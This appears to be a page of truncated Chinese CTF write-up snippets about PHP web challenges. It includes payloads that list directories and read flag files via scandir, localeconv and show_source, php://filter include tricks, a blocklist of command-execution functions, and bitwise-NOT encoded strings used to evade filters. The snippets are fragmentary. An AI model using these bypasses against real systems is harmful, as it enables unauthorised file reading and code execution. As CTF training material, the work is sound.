c=show_source(next(array_reverse(scandir(pos(localeconv()));//师傅们给出的 payload,想法奇特,学到很多 3、伪协议 ctf 中伪协议常用 php://filter、php://input 以web37 为例 error_reporting(0);if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/flag/i",$c)){include($c);ec...
因为本题并没有过滤"空格+字母",所以" num"能通过WAF检测,PHP在读取时删除了空格,就完成了绕过 PHP scandir() 函数 scandir(directory,sorting_order,context); 返回指定目录中的文件和目录的数组 PHP echo() 函数 与 print() 函数 echo(strings)&print(strings) 输出一个或多个字符串(以及整型和int型浮点型...
http://127.0.0.1/ctf/web/web-5/index.php?exp=pprint_r(array_rand(array_flip(scandir(pos(localeconv())); 由上图可以看出,通过array_rand()能够随机出flag.php文件,然后利用readfile()函数,读取该文件: 代码语言:javascript 代码运行次数:0 运行 AI代码解释 http://127.0.0.1/ctf/web/web-5/index.php?
这里使用 scandir() 函数对根目录进行扫描,使用 file_get_contents() 函数获取指定文件内容,并使用 var_dump() 输出前述两个函数返回的结果。因此只需通过 POST 方法分别传入以下 payload 即可在调试界面获得 flag,之所以要在调试界面查看是因为字体默认为黑色,而本站背景就是黑色,因此看不出来。 代码语言:javascrip...
c=show_source(next(array_reverse(scandir(dirname(__FILE)));`,highlight_file()可以和show_source()替换。后来具体找了一下这个题,在buu上找到了,叫禁止套娃,可以去做一下。ctfshow web124 这个也是去年国赛的一道题,叫Love_Math,打开查看源代码 <?phperror_reporting(0);//听说你很喜欢数学,不知...
// 用 var_export print_r 输出数组 // 查看路径 scandir() //:array system('ls') glob() //:array //查看当前目录 echo new FilesystemIterator(getcwd()); // 查看文件 show_source readfile new SplFileObject($filename,'r').fpassthru() fpassthru(fopen('test.txt', 'r')) file_exists is_...
1.web2 听说聪明的人都能找到答案 CTRL + u 查看源代码2.计算器 改一下字符输入长度的限制3.web基础$_GET ?var=val4.web基础$_POST 直接用BurpSuite改包,注意先改为POST request5.矛盾 $num = G E T [ ′ n u m ′ ] ; i f ( ! i s n u m e r i c ( _GET['num']...
'); } else { if(isset($_GET['code'])) { $admin = $_GET['code']; $admin = addslashes($admin); if(preg_match('/\{openlog|syslog|readlink|symlink|popepassthru|stream_socket_server|scandir|assert|pcntl_exec|fwrite|curl|system|eval|assert|flag|passthru|exec|system|chroot|chgrp|chown...
过滤了很多常用的执行系统命令的函数,先尝试读取系统目录,可以使用scandir函数 AI检测代码解析 print_r(scandir('./')); print_r #%8F%8D%96%91%8B%A0%8D (~%8F%8D%96%91%8B%A0%8D)(); scandir #%8C%9C%9E%91%9B%96%8D (~%8C%9C%9E%91%9B%96%8D)(('./')); ...
$obj,$attr).getDocComment()查看类中的注解// 用 var_export print_r 输出数组// 查看路径scandir...